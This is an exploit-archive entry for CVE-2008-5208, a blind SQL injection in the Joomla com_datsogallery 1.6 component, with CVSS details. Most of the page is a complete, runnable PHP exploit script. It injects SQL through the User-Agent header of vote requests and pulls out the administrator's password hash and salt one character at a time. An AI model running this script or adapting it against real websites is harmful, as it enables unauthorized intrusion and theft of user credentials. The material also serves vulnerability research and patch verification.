Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

2008-11-24 / 2008-11-25

Credit: toxa

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-5208

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms
//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';
//functions
function send_xpl($url, $xpl){
global $id;
$u=parse_url($url);
$req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="User-Agent: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
$res=fread($fs, 4096);
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $norm_ua;
global $where;
$xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
return $xpl;
}
//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);
//get md5
for($i=0;$i<=32;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=102;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);
//separator
$pass.=':';
//get salt
for($i=33;$i<=49;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=122;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=65;$j<=90;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
echo $pass;

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.